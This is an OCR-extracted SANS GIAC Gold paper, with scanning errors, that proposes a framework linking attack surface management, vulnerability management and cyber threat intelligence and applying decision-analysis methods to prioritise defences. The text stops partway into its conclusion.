Threat Intelligence-Driven Attack Surface Management GIAC (GCTI) Gold Certification Author: Jonathan Matkowsky, jmatkowsky@mierosoft.com Advisor: Hamed Khiabani, Ph.D. Accepted: July 25, 2022 Abstract Defenders struggle to keep up with the pace of digital transformation in the face of an expanding modern enterprise attack surface and more sophisticated adversaries. A conceptual framework for relating attack surface management (ASM) to vulnerability management and cyber threat intelligence (CTI) improves cyber defense. The framework explains how ASM improves cyber resiliency in proactively detecting and responding to weaknesses that adversaries could exploit to cause unacceptable harm. Defenders should prioritize ASM aligning with the business continuity and enterprise risk management functions. A CT/-driven ASM conceptual framework (CTI-ASM) helps defenders achieve decision clarity on how best to prioritize preventing the most impactful exploitations based on adversaries’ capabilities, opportunities, and intent, Security researchers have applied decision analysis methodology to solve various security challenges generally. Applying decision analysis methodology to CTI-ASM may improve the quality of its implementation and support higher quality CTI. Potentially helpful decision analysis tools and concepts include relevance diagrams, possibility and probability trees, sensitivity analysis, corporate risk attitudes, weighing imperfect information, and accounting for cognitive biases, © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 2 1. Introduction This commentary suggests that a cyber threat intelligence (CT1)-driven attack surface management (ASM) conceptual framework (CTI-ASM) may improve cyber resiliency against a continuously expanding enterprise modern attack surface (AS) and more sophisticated adversaries. After discussing desirable features of CTI-ASM and possible technical tools, methods, and architectures to implement CTI-ASM, the commentary suggests that applying decision analysis methodology (DA) could improve both CTI-ASM and CTI DA isa scientific method combining systems analysis and statistical decision theory for making rational decisions in complex, dynamic, and uncertain situations. (Howard & Matheson, 1989). Security researchers have applied DA to physical security systems (Lin et al., 2009), document trustworthiness (Bong et al., 2012), hardware security, counterfeit electronics detection, cyber system upgrades and maintenance (Collier et al., 2014), and intrusion detection architectures (Zbakh et al., 2015). They have more recently applied DA with graph analytics for cyber system resiliency (Dwivedi, 2018), rank-weight methods for multi-criteria decision analysis (Gourisetti et al., 2020), dynamic information processing (Hong, 2020), and simulations to improve risk thinking (Shreve et al., 2021). 2. A glimpse of the enterprise attack surface The AS is the enterprise’s weakness in its security procedures and internal controls that adversaries want to exploit. (NIST, 201 la, p. bl). Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 3 Fig. 1. Woodall, T. (2022). Modern Day AS. IPEG File. Adversaries target any business units or functions within the enterprise to obtain unauthorized data access or disrupt services. (NIST, 2012b). The targeted AS not only includes valuable data, intangible assets, and intellectual property more generally but also ‘machine learning (ML) and artificial intelligence (Al), which as adversarial failures in ML and AI increase, will become more pressing (cf. Microsoft, 2020). By viewing the AS from the adversaries’ perspective [Fig. 1, supra], defenders may find the path of least resistance that adversaries will target. The path of least resistance is any initial trajectory by which adversaries start causing harm through flaws discovered externally in enterprise assets. Other external forms of vulnerability require more than passive scanning — interactive probing or exchanging communications to spot weaknesses, such as social engineering used in penetration testing. Assets partly define the AS within the established points that an adversary can influence, access, or change to the possible detriment of the enterprise's mission, aims, and priorities (cf. Barrett, 2018, p. 14). The AS is dynamic, though. It includes anybody, any place, and anything that is either supporting operations or furthering the strategic direction that the system is interacting with or connected to; this includes embedded processors and controllers, telecommunication networks, and parts of the Internet. (Stine et al., 2021, p. 18; Joint Task Force, 2018, p. 16; NIST, 201 1a, pp. 1, b3; NIST, n.d.) Much like people and software they write, prone to errors, are targeted to get a stronger foothold into an organization, supply chain systems are also part of the AS. Protecting high-confidence bodies of training data, for instance, is a supply chain issue: engineers reuse models trained by others because training algorithms are resource- intensive (Microsoft, 2022h; Shankar et al., 2020). MITRE ATLAS case studies illustrate how adversarial ML techniques can cause considerable damage to production ML. (MITRE, n.d.). Supply chain systems may integrate several technologies running on cyber- physical infrastructures and digital system components (Yeboah-Ofori et al., 2021). It is Solar Winds (CVE-2021-35244, 2021), defenders should not just high-level systems. Post secure the supply chain using software vulnerability assessment tools like MITRE’s Software Assurance Platform (MITRE, 2022). Also, code vulnerab ties, such as from Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 4 open-source software repositories relied on by developers, are part of the AS. (Microsoft, 2021e, p. 74; Wilburn & Schmidt, 2022). Finding the confines of a system affected by vulnerabilities is challenging because it requires understanding what it means for one system to be part of another. (Spring, 2022). 3. Challenges of protecting the attack surface Defenders struggle to keep up with the pace of harmful cyber activity converging with the speed of digital transformation. Cyber risk is already perceived ubiquitously as a top enterprise risk. (Kumar, 2022). Moreover, the number of incidents is only rising in tandem with a broadening range and increasing severity of harm. (Silver, 2021), Some say that before the Covid-19 outbreak, a business suffering a security breach could permanently lose anywhere from twenty to forty percent of its customer base. (PCI Pal, 2019). As a result of the Covid-19 outbreak, organizations are even more vulnerable to cyber threats (McA fee & FireEye, 2021). They rushed to move their operations online. (HBR, 2021, p. 2). “With legions of employees working from home and business processes quickly digitized, corporate information technology systems and data stores suddenly grew in size and complexity, offering an expanded and enticing [AS}.” (HBR, 2021, p. 2). Global digital transformation is accelerating faster than during the height of the pandemic and will likely continue for at least the next several years. (IDC, 2022b). The continued extension of enterprise boundaries and increased asset movements expands the AS. For instance, the dramatic rise in remote access services and virtual private network (VPN) usage during the Covid-19 pandemic made specific organizations more vulnerable. (cf. Ginty, 2022). According to the advisories cited in ZDner, the ncreased vulneral ities stemmed from organizations that patched or updated VPNs relatively infrequently, neglected multi-factor authentication, or resorted to trying to protect insecure services behind non-standard ports that adversaries could scan. (cf. Ginty, 2022), Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.‘Threat Intelligence-Driven Attack Surface Management | 5 In addition, corporate data infrastructure and applications now run across multiple clouds and hybrid environments (Badhwar, 2021, p. vii). Asa result, even state-of-the-art firewalls and detection systems cannot alone safeguard corporate systems or infrastructure behind a moat; the enterprise would remain connected to the Intemet. (cf. Doerr, 2021). Furthermore, traditional perimeter defenses do not prevent adversaries from moving across the enterprise or steadily increasing access and control. (Doherty & McKenney, 2021, p. 1). ‘The Internet has progressively and effectively become the new perimeter. (Sargent, 2022; Rose et al., 2020, p. 1). In addition, supply chain attacks prey on the fabric of mutual trust and. dependencies supporting the economy, such as NOBELIUM SolarWinds and HAFNIUM. on-premises Exchange Server attacks (Microsoft, 202le, pp. 1, 48, 58). Also, rapid and widespread adoption of the Internet of Things and operational technology—from smart speakers to voice-over-Intemnet protocol-connected printers (ef. Hallum, 2021)— contributes to a much larger and more complicated AS. In addition, programmable systems and devices now regularly direetly or indirectly interact with physical environments, including industrial controls, building management and physical access control, and environment measurement systems. (NIST, n.d.). Adversaries may now control cyber-physical systems—oil and gas pipelines, electrical power, autonomous vehicles, drones, traffic flow, transit systems, and even biological implants. (ef. Microsoft, 2021¢, pp. 71, 79, 82). For instance, critical security vulnerabilities in certain Chinese-made MiCODUS MV720 GPS trackers that are currently being used in over a hundred and fifty countries by businesses across a wide range of industries as well as by military, law enforcement, government agencies and even a nuclear power plant operator, can easily be exploited remotely to fully control GPS, disarm vehicle alarms, change their routes, and cut off their fuel. (Ahmed, 2022). “The amount of potential attack surfaces, attack vectors, and avenues for cyber- physical attacks is practically infinite.” (Hamilton, 2021). This control is partly why ransomware payments in the United States have soared—hundreds of millions yearly. (WSJ, 2022). There is potential for mass breaches of sensitive information and Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 6 exploitations of critical memory allocation vulnerabilities that can crash systems across many industries and verticals. For example, Cobalt Strike, commonly used in the public and private sector as a penetration testing platform to test a firm’s resiliency, has been so widely deployed by adversaries that RiskIQ detects a command-and-control (C2) server more than hourly. (Ginty, 2022). Vulnerable end-of-life, unpatched, expired services and ‘open ports are continuously in plain sight. (Ginty, 2022). Because there is no longer a single, easily identified perimeter for the enterprise, an intentional extension of focus to monitor the maintaining visibility requi proliferation of mobile devices, Bring Your Own Device, Intemet of Things, and cloud ‘computing. (Stine et al., 2020, p. 17). In addition, because most organizations embrace a multi-cloud strategy, there is a growing AS of multi-cloud deployments of container technologies—virtual machines running “containers” of microservices and their packaged dependencies and configurations (¢.g., Kubernetes and Docker). (CTID, 20214). Unsurprisingly, organizations proactively managing their AS typically find approximately thirty percent more assets than they knew they owned. (Microsoft, 2022g). And the metaverse may be the surge on the horizon. The next generation of the Internet beyond mobile and Web in an autonomous virtual shared space amplifies the existing AS. Devices that can be used as entry points threaten safety in the physical world through massive data streams and sensors collecting brain wave patterns, facial expressions, eye movements, hand movements, speech, and biometric features (Wang et al., 2022). The metaverse blurs digital and physical boundaries. As a result, protecting against Deepfake events will be more challenging, along with new challenges of compliance, privacy, identity, and trust management. (Wang et al., 2022). 3.1. Sophisticated adversaries ‘Not only has the AS expanded and continues to expand but also, we now face sophisticated adversaries. They are not only compromising assets supporting business operations (Joint Task Force, 2018, p. 119) but explicitly targeting critical infrastructure, like crippling or holding hospitals hostage. (WSJ, 2022). Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 7 Also, these days, state actors want to infiltrate vital institutions in the public sector and private sector businesses that everyday households and local communities depend on for their personal and financial wellbeing. (cf., The White House, 2021), Even non-state actors regularly deploy advanced anti-forensics and can more precisely target our weakest points (Dehghantanha ct al., 2019, pp. 3, 165). They steal business model algorithms and inject payloads through mobile apps that poison deep learning models impairing child safety (Yale & Zonghao, 2021). They also target ML models widely used for eyber defense. (Beek, 2020). RiskIQ blocklists a newly detected malicious mobile app every five minutes (Microsoft, 2022f) and more than half a million new pieces of malware daily. (Ginty, 2022), Threat actors change their playbooks often, use sophisticated anonymization, and commoditize sophisticated attack kits. (Microsoft, 2021, pp. 1, 8-9, 20). Some of these attacks begin and end within as little as an hour or ‘two. (Microsoft, 2021¢, p. 23). Last year alone, Microsoft observed more than ten billion malware threats, more than thirty-five billion phishing, other malicious emails, and over nine hundred brute force password theft attempts every second. (Jakkal, 2022). Cybercrime will cost over ten trillion U.S. dollars annually by 2025. (Jakkal, 2022). Imagine if these costs could be avoided. It would be enough money for the U.S. government to distribute an annual stimulus check for nearly thirty thousand dollars to every person in the United States. (ef. CIA, nd). Russian Federation’s attack on Ukraine and the resulting war further wrenched cyber preparedness throughout Europe and the United States. European Chief Information Security Officers (CISOs) are reassessing well-developed supply chain security guidelines and are concerned they need stronger cyber resilience due to the war. Likewise, almost half of U.S. CISOs expeet to increase network protection because of the war. (IDC, 2022a). 4. Attack surface management With continuously expanding attack surfaces and more sophisticated adversaries, “zero trust” paradigm now defines security aims (Rose et al., 2020, p. 4). This paradigm Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 8 requires continually analyzing, and evaluating risks to corporate identities, devices, applications, data, networks, infrastructure, and business functions under the assumption that the adversary is present in the environment, (Rose et al., 2020, p. 1; Microsoft, 2021e, p. 48). After all, incomplete knowledge of deployed systems and their patch state makes organizations more vulnerable to sudden large-scale attacks. (Microsoft, 202¢, p. 48). Because of the continuously expanding AS and more sophisticated adversaries, to decide surance providers may expect continuous assessments and dynamic analy: premiums and proper coverage. (cf. Badhwar, 2021, p. 328). Also, given the challenge of protecting an enterprise from harmful cyber activity, public companies must consider the impacts of foreseeable cyber breaches, anecdotally exemplified by Bridgestone and Toyota choosing to proactively shut down parts of operations until they could better understand how cyber risk was affecting their operations. (Harvard, 2022). Gone are the days when protecting the perimeter through antivirus, firewalls, and Jog management suffice. Nonetheless, many defenders struggle to integrate a myriad of solutions to adjust to this complex environment because “[t]here is often a divide between business/mission owners and security/technology management.” (Souppaya & Karen, 2022). ASM enables an organization to achieve and maintain an acceptable level of loss exposure cost-effectively (Freund & Jones, 2014, chap. 14) by combining practices and measures to achieve organizational aims as a management system (cf: Kazmi & ‘Naarananoja, 2014, p. 97). ASM helps protect against decentralized and independent solutions whose architectures and records are not optimally compatible with performance measurement. Performance measurement is an essential element of ASM reporting progress and finding gaps. (cf. Kazmi & Naarananoja, 2014, p. 98). 41. Vulnerability scanning and patch management Enterprise vulnerability scanning and patch management (VuM) lays the foundation of ASM and supports defenders striving to proactively spot mismanaged resources before adversaries can use them for harmful cyber activity. Misconfigurations Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 9 are often a root cause of compromised systems. (Diogenes & Shinder, 2018, Ch. 1). “Indeed, Gartner predicts that by 2025, more than 85% of successful attacks against enterprise users will exploit configuration and user errors in legacy systems.” (Gartner, 2021a, p. 4). 4.2. Bu: Defenders may gather insights from the business contin ess continuity and enterprise risk management ity management (BCM) function on how and what to prioritize protecting, especially for evaluating and considering the probable frequency and size of acceptable future losses (Freund & Jones, 2014; ISO, 2020, p. 2). For example, BCM may help to define the types of and the extent to which disruption is tolerable across a range of possible negative consequences for the organization: reputational damage, operational harm, contractual damages, monetary loss, legal repercussions, regulatory fines, and failure to deliver on business goals or lost business opportunities. (ISO, 2020, pp. 4, 22). In addition, ASM may gain insights from the enterprise risk management (ERM) function within the organization (Joint Task Force, 2018, p. iv, Stine et al., 2020, p. 4). Evaluating the criticality and sensitivity of enterprise assets shapes the proper risk tolerance. (Stine et al., 2021, p. 18). Coordinating with ERM would help ensure risk alignment of resources with the organizational mission and vision and may help ERM protect shareholder value. (COSO, 2017, pp. 2, 5) Coordinating with ERM is also important because cyber risks interlock with various other types of enterprise risks. (ef, NIST, 2016c). “[Such] incidents can have operational, financial, reputational, and strategic consequences for the organization and these incidents are growing in number and cost.” (Gartner, 2021b, p. 1). To fortify business goals and aims, ASM relies on senior leadership to define mission priorities, proper capital and operating expenses, and adequate risk appetite and tolerance, (Stine et al., 2021, pp. 11, 15). In addition, turning to senior leadership is the only way to decide how to protect business assets based on their value to the business and the expected risk. (Open Group, 2021). Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 10 4.3, Continuous Visibility Whether continuous visibility comes from a mature VuM program as part of ASM. or from ASM software and managed services, ASM requires constant visibility into all the enterprise endpoints and assets. ASM focuses on managing adversaries’ uncertain potential negative impact, understanding how adversaries exploit vulnerabilities, and neutralizing the exploitations by reducing the AS. (Smith, 2022). Assets include embedded devices and servers, cloud services, source code, pre- deployed code, software platforms, virtual machines, applications, and their dependencies and sources, components, operating systems, firmware, and which software and versions those assets run down to the level of package and libraries (Souppaya & Karen, 2022; Diamond et al., 2022). For instance, ASM should supply continuous visibility of cloud assets across a multi-cloud environment to spot any misconfigurations or vulnerable components and understand how a potential adversary may try to exploit them. (Estrin, 2022). After all, adversaries weaponize cloud resources to harm other target systems because of poor security hygiene, such as sharing public key secrets in a public cloud. For instance, bots will scan for keys leaked into log files on Continuous Integration and Continuous Delivery (CI/CD) services used for automation in building, testing, and deployment of applications and in Git repositories, such as GitHub, to steal these keys (Diogenes & Shinder, 2018, Ch. 1). ASM includes the “activities, technology and managed services deployed to discover internet-facing enterprise assets and systems and associated vulnerabilities” that adversaries would want to exploit (Shoard & Handa, 2021, p. 10)—even before any intrusion, during the reconnaissance stage. (Hutchins et al., 2011). Otherwise, adversaries may be trying to maintain persistence or act on their objectives by the time they are detected. ASM organizes information enabling decisions on how to address the threats of adversaries’ uncertain potential adverse impact and improve continuously, (Barrett, 2018, p. 6). For example, defenders may prefer integrating relevant detection queries based on ASM priorities into an extended detection and response (XDR) solution with security orchestration, automation, and response (SOAR) capabilities. (Microsoft, 2020). This Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 11 integration would use automation and ML or hunter-trained AI to collect, correlate, and analyze relevant data across the enterprise environment—including endpoints, email traffic, applications, virtual machines, and identities. After all, to meet the increased demands for digital interfaces and services and support a hybrid work environment, ASM must use expert-assisted AI, ML, and automation to effectively manage security risks at scale. (HBR, 2021, pp. 4, 8). For instance, ASM may automatically surface and apply mitigation to vulnerable devices, software, files, and container images running in the cloud that use an affected Log4j ‘component. (Microsoft, 2021f). Defenders should also be able to discover attack surfaces in website paths and covert vulnerabilities in payloads with ASM. (cf. Yan et al., 2022), In addition, ASM software should be able to consolidate AS vectors from multiple scanners to detect cross- site scripting vulnerabilities and other security issues in Java web applications and PHP web application vulnerabilities. (Yan et al., 2022). With ASM, defenders identify a broad range of technical vulnerabilities used to gain initial access and non-technical vulnerabilities, such as exposed personal or access information in open-source data (Roy et al., 2022). ASM then helps contextualize how specific vulnerabilities from across the host, application, and network layers, when. sequentially combined, become more effective for the adversary (Roy et al., 2022; Spring etal., 2021). ASM should illuminate what the adversary would target during the reconnaissance stage (Hutchins et al., 2011) when trying to infiltrate the organization. (Shoard & Handa, 2021, p. 4). This ASM feature is sometimes called “External ASM” (Microsoft, 2021e). External ASM can detect vulnerabilities that the adversary would ‘want to use to gain an initial foothold and drop remote access toolkits, activate hands-on- keyboard attacks, exfiltrate data, and deploy ransomware through libraries on devices, software files, and components. (cf. Microsoft, 202d) 5. Threat intelligence-driven attack surface management ASM alone does not measure whether adversaries commonly exploit an exposure or whether a vulnerability is well-known. In addition, it does not explain the degree of Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 12 control or the benefit that the adversary would stand to gain, how easy it would be to get, started, the specific impacts on human safety, if applicable, or the company’s mission. (Spring, 2022). Even after fine-tuning ASM based on BCM and ERM inputs, it appears from computational modeling applicable to modern systems that programmers cannot produce “a pragmatically useful piece of software....without vulnerabilities,” which are “countably infinite.” (Spring, 2022, pp. 11-12). Therefore, the technical details of specific vulnerabilities are not as helpful without understanding which vulnerabilities are likely to be used at any exact time and in a particular organization (Spring, 2022, p. 17). CTI- ASM helps contextualize how to prevent vulnerabilities from being exploited beyond the technical severity offered through Common Vulnerability Scoring System (CVSS). Also, teams cannot focus on all threats, or they will get burned out. (Godyla & Nickels, 2021). With CTI-ASM, defenders can use CTI assessments to prioritize vulnerabilities based on understanding the adversaries’ capabilities, opportunities, and intent in conducting their harmful eyber activity. (ef. Brown & Lee, 2021). CTI aids defenders in understanding the chronology of harmful cyber operations in the context of monitoring across endpoints, identities, and applications—both in the public and private cloud and hybrid. (cf. Microsoft, 2021b). This way, defenders ean not only detect and block malicious components of a single operation but also of a campaign and follow-on campaigns. (cf. Microsoft, 2021). CTI-ASM also reflects a conscientious effort to reduce methodical and perceptive biases in making judgments and analyzing evidence (cf. Heuer 2019, pp. 111-72). Accordingly, it includes an “audit trail” of interpretations (Heuer, 2019, p. 109), presents assumptions and sequences of extrapolations, shows the level and basis of hesitation, and (Heuer 2019, p. 16). reveals and explains other viewpoints Similarly, Charles T. Munger, Warren Buffets partner in running Berkshire Hathaway, noted that Darwin’s impact on science was due in considerable measure to prioritizing any evidence tending to undermine whatever cherished and hard-won theory he already had. (Davis, 2009). According to Mr. Munger, Einstein also partially attributed his successful views to self ticism, which Mr. Munger explained means testing and destroying his well-loved ideas. (Davis, 2009) CTI-ASM (including Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 13 embedded AI and ML) should similarly be self-< al, continuously striving to find evidence to confirm the weaknesses in any of its insights or convictions. Process-wise, CTI production starts with collecting and evaluating cyber threat information in its source and reliability through rigorous and structured tradecraft techniques using all-source knowledge and substantive experience. (Security Intel, n.d.). It is an “intelligence-driven” method to detect rapidly, respond to, and recover from threat events aimed at safeguarding assets (Stine et al., 2021, p. 26). CTI-ASM collects information on threats and threat actors from various technical and human means (Kriaa & Chaabane, 2021, p. 113) and expresses this comprehension in a structured way using proper analysis techniques. (Schaberreiter et al., 2019). CTI-ASM is cyclical. Data collection is planned, implemented, and evaluated using systematized analytic skills. It distributes and reevaluates the resulting intelligence based on feedback from a wide range of data collection sources, such as Kusto Query Language (KQL) queries (Microsoft, 2022c) for unusual processes that may have launched on a protected endpoint, and more current knowledge. Finally, CTI-ASM restructures the collection and fills intelligence gaps. (ef. Security Intel, n.d.). Human experts assist AI and ML in CTI-ASM to promptly inform decision-makers, based on the evidence, about proactive and reactive cyber defensive measures. (cf. CIS, 2021a). CTI-ASM derives actionable insights into how adversaries plan, conduct, and sustain their operations. It engages in direct attribution or profiling the type of threat actor using a robust and reliable set of considerations. CTI-ASM decides the malicious activity’s scope, origin, and direction, assesses a timestamp, and evaluates the adversarial goals, aims, and TTPs (tactics, techniques, and procedures). (Mavroeidis et al., 2021, p. 328), CTI-ASM streamlines the collection and processing through automation that frees up analyst time needed to use CTI for awareness of the AS. (ef. Brown & Lee, 2019, p. 15). For instance, last year, local governments found they could cut down the time needed to take defensive measures from days to a few minutes by taking part in a pilot project testing an automated data feed of potential network compromises. (CIS, 2021a). T speed tends to be critical when dealing with hybrid attacks across multiple domains. For instance, blocking an adversary in the cloud from running malicious eode on an Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 14 endpoint will not stop the attacker from doing it again if they already have gained persistence in the cloud. However, automation tools, fusing actionable intelligence across domain boundaries, remediating all affected assets, and improving the security configurations prevent a recurrence. (Microsoft, 20224) Applying ML techniques and algorithms to CTI properties can improve the accuracy of threat prediction analysis and hypothesis generation (Elitzur et al., 2019, p. 47). Such an application also helps find foreseeable vulnerabilities in the supply chain (e.g., ransomware and spear-phishing) and helps to apply reasonable controls. (Yeboah- Ofori et al., 2021). In addition, ML and data mining have successfully analyzed malware and detected anomalous networks, including analyzing Border Gateway Protocol behavior. (Dehghantanha et al., 2019, pp. 3, 67). Similarly, Microsoft uses statistical methods to track threat actors and TTPs ( rosoft, 202 1a). Therefore, CTI-ASM includes the application of Al and ML to recognize, absorb and act wisely against more advanced forms of harmful eyber activity. (Dehghantanha et al., 2019, p. 3). ML derives risk scenarios from potential threats and vulnerabilities in crucial assets contributing to the AS. CTI-ASM will assess the derived risk scenarios on their impacts and frequency of effects. (Stine et al., 2021, pp. 32-33). CTI sources include commercial subscriptions, automated data feeds, sector- specific sharing of indicators of compromise and alerts, industry-specific threat models, and knowledge bases of observed adversary tactics and techniques. (Stine et al., 2021, p. 26). CTI formats in CTI-ASM include frameworks, standards, scoring, and enumerations. For example, MITRE ATT&CK (MITRE, n.d.) supplies an overview of specific threat characteristics. STIX2.1 (Structured Threat Information Expression) Course of Action (CoA) object a standard for describing threats, attacks, and the facets of security incidents. CVSS supplies metrics for assessing the implications of artifacts. Common Weakness Enumeration (CWE) supplies enumerations and unique identifiers for specific artifacts. (Schlette & Pernul, 2021, pp. 2527-28). Using the open-source tool ATT&CK Workbench, an organization may manage and extend their local version of ATT&CK and keep it coordinated with MITRE’s knowledge base to align CTI-ASM with the knowledge base. (ef. CTID, 20216). Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 15 CTI-ASM may ingest real-time CTI indicator feeds by using the Trusted Automated Exchange of Intelligence Information (TAXI) application protocol for transmitting STIX data from a TAXII server (cf., CIS, 20214). It also uses “attacker behavior modeling” to understand attack schemes and improve detection and analytic competencies, (cf. Elitzur et al., 2019, p. 41). Using threat modeling, CTI-ASM helps focus on what an adversary wants to target (ef. Godyla & Nickels, 2021), such as by generating probabili attack graphs using CTI data. (Gylling et al., 2021), These graphs have successfully stopped ransomware actors just two minutes into an attack. (Microsoft, 20214), A CTI-ASM architecture of an XDR solution with SOAR capabilities based on zero trust architecture supplies cyber-situational awareness of events (Doherty & McKenney, 2021, p. 3) to reduce the AS. This CTI-ASM architecture continuously watches assets for insights and anomalous patterns. (ef. Open Group, 2021). In addition, it grows telemetry to have increased vi ty of the evolving relevant holdings of all types. (cf. Open Group, 2021). Furthermore, it prioritizes based on risk analyses informed by current information on active threat actors and technical attack techniques. (ef. Open Group, 2021). By understanding attack flows rather than focusing on one specific action at a time, CTI-ASM helps to compose realistic adversary simulation scenarios (ef: CTID, 2022). In addition, understanding the impact of CVEs (Common Vulnerabilities and Exposures) through the lens of ATT&CK adversary behaviors within CTI-ASM may help supply the necessary context. (CTID, 2021). Specifically, how adversaries use specific vulnerabilities to achieve their goals helps prioritize those vulnerabilities according to the actual risk in the defender’s environment. (CTID, 2021¢). The increased situational awareness from CTI-ASM helps minimize the enterprise AS (Mavroeidis et al., 2021, p. 328). By swiftly connecting observed behaviors and characteristics to threat actors, CTI-ASM may supply i ispensable insights that can enable organizations to counter attacks because how an attack progresses will depend on the adversarial goals and TTPs. (Microsoft, 2021a). For instance, if an election office shares a malicious IP (Internet Protocol) address through an indicator sharing program, Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 16 other election offices use a firewall block list and prevent the same attack within seconds. (CIS, 20216). By deploying CTI-ASM, defenders may apply AS reduction rules in a SIEM (Security Information Event Management) or XDR to help prioritize vulnerabilities and misconfigurations to block entry vectors and lateral movements more effectively (Microsoft, 2022i; Microsoft, 202d). For instance, CTI-ASM may apply AS reduction rules to critical remote code execution vulnerabilities discovered in specific versions of Apache’s Log4j software library (Log4Shell) that adversaries use to take control of many affected systems. (CISA, n.d.). In addition, CTI-ASM may inform defenders of incidents that may need more scoping. (Microsoft, 202d), CTI-ASM may curate threat indicator feeds using a CTI platform that loads into a SIEM or XDR-SOAR (Microsoft, 20214) to provide context for understanding how to improve resiliency with artifacts and other telemetry data. ‘There are tools to enrich and help visualize CTI-ASM data, such as the msticpy set of Python tools (MSTIC, 2021). Much of the msticpy package is agnostic to the data source. For example, Microsoft designed msticpy for use in Jupyter notebooks. Jupyter is an interactive development and data manipulation environment hosted in a browser that returns the output of code it executes from what a user types into a cell. (Microsoft, 2019). Msticpy includes data providers and pre-built queries for easy access to security data stores, CTI, and geo-location queries to supply context (e.g., clustering, time series analysis, anomaly identification, base64 decoding, and IOC pattern extraction), With ‘msticpy, CTI-ASM analysts can pivot to derive additional indicators for additional context and use the CTI lookup class to search for an individual or multiple indicators of compromise (IOC) from one or more CTI providers. Msticpy also includes mechanisms to visualize event timelines, process trees, mapping, charts, and time series. (Microsoft, 2019). 6. Applicability of decision analysis Analysts may apply several DA concepts to improve the quality of CTI and CTI- ASM. Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 17 DA tools may help ensure that CTI-ASM incorporates an appropriate risk attitude (cf. Howard & Abbas, 2016, ch.11). They also help ensure that CTI-ASM priorities reflect a unified corporate risk tolerance and not the risk tolerance of only specific individuals within an organization. (Howard & Abbas, 2016, pp. 781-85). The risk tolerance of specific individuals differs depending on where the individual sits. (Howard & Abbas, 2016, pp. 781-85). While there may be a significant first struggle to gather the relevant risk information and organizational data, this material can be resourcefully reused and only refreshed intermittently. (Spring, 2022) DA relevance diagrams may help understand the current state of information and errors in assessments. (cf. Howard & Abbas, assert irrelevance relations to avoid lo} 2016, Ch. 7). Also, while information gathering is necessary for CTI, a suitable value may be placed using DA on even imperfect information to avoid wasteful information not relevant and material and gathering and ensure that the information’s significanc higher than its cost. (Howard & Abbas, 2016, ch.13). Distinctions made in CTI should help reach decision clarity; many observable differences are not particularly useful because they supply no benefit, (Howard & Abbas, 2016, pp. 84-85). Possibility trees standing for multiple distinetions—from one degree to compound possibilities may help drive clarity. (Howard & Abbas, 2016, p. 87). CTI deals with measures of belief or probabilities that depend on the state of information. Therefore, probability trees may help graphically support a division of certainty through many distinctions, each having multiple degrees. The assessment may sometimes change by knowing that certain degrees of other distinctions have occurred. (Howard & Abbas, 2016, Ch. 6). Sensitivity analysis may help decide whether more investigation is necessary and may be used to clarify how the assessment would change if certain predicates changed in the decision basis. (Howard & Abbas, 2016, ch.12). CTI often relies on multiple sources of information, requiring an assessment of the relevance relations between them because joint information can be higher than, less than, or equal to the sum of data value from individual sources. (Howard & Abbas, 2016, p. 397). DA relevance diagrams and probability trees may help in this regard as well. (Howard & Abbas, 2016, ch.18). Jonathan Matkowsky, jmatkowsky@microsoft.com © 2022 The SANS Institute ‘Author retains full rights.Threat Intelligence-Driven Attack Surface Management | 18 ‘The methodology of generating CTI assessments, much like DA, requires careful attention to cognition, which is the process that tums perceptions into beliefs. (cf. Howard & Abbas, 2016, p. 351). Based on cognitive psychology, for instance, one cause of cognitive biases causing opinions to reflect perceptions improperly is wishful thinking —forming beliefs based on what should be, rather than on evidence and letting a particular worldview affect our thinking process. (Howard & Abbas, 2016, p. 351). Another is the misuse of the availability heuristic, which claims that the easier it is to think of an event, the more likely it is to happen, such as using more current information to blow events out of proportion, (Howard & Abbas, 2016, p. 351). Another thinking error is estimating probabilities based on often incorrect similarity judgments that misinterpret the effect of uncertainty rather than first separating prior information from new evidence and then processing the data using probability theory. (Howard & Abbas, 2016, p. 352). Another cognitive bias relevant to CTI from DA is forming beliefs prematurely, letting our first ideas play too large a role in deciding our final assessments. (cf. Howard & Abbas, 2016, p. 353). Like DA, CTI must consider the tendency of implicitly conditioning probability on the occurrence of uncertain events, (cf. Howard & Abbas, 2016, p. 354). Also, like DA, CTI must safeguard against the hidden effects of subconscious motivation, such as when self-interest influences beliefs. (cf: Howard & Abbas, 2016, p. 355). Motivational biases can also occur within CTI teams, such as differing incentive structures tending to influence assessments unless scrutinized for biases affecting thought processes. (cf. Howard & Abbas, 2016, p. 785). “While there is no definitive index, over 200 cognitive biases have been identified in psychology, sociology, and management research.” (Mohanani et al., 2020, sec. 1). Cognitive biases are essential to be aware of as they can affect CTI quality and CTLASM. 7. Conclusion This commentary offers 